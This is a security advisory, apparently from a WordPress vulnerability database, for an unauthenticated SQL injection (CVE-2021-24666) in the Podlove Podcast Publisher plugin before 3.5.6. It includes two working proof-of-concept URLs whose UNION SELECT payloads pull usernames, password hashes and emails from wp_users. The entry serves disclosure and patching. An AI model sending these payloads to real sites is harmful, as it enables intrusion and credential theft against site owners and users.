WordPress Plugin Vulnerabilities

Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection

Description

The plugin contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P<id>[\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.

Proof of Concept

With the 'Social & Donations' module of the plugin activated.

Permalink Setting: Plain

PoC with payload in id param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

PoC with payload in category param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&category=1')+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

Affects Plugins

Plugin icon
podlove-podcasting-plugin-for-wordpress
Fixed in 3.5.6

References

CVE
CVE-2021-24666
URL
https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
fb4d7988-60ff-4862-96a1-80b1866336fe

Timeline

Publicly Published
2021-08-24 (about 2 years ago)
Added
2021-08-24 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other

Published
Title
Published
2021-02-08
Title
Contact Form by Supsystic < 1.7.11 - Authenticated SQL Injections
Published
2023-09-11
Title
Slimstat Analytics < 5.0.10 - Contributor+ SQL Injection
Published
2016-11-28
Title
Product Catalog 8 1.2 - Unauthenticated SQL Injection
Published
2014-09-07
Title
Spider Facebook < 1.0.10 - Authenticated SQL Injection
Published
2014-08-01
Title
WordPress <= 1.5.1.1 - "add new admin" SQL Injection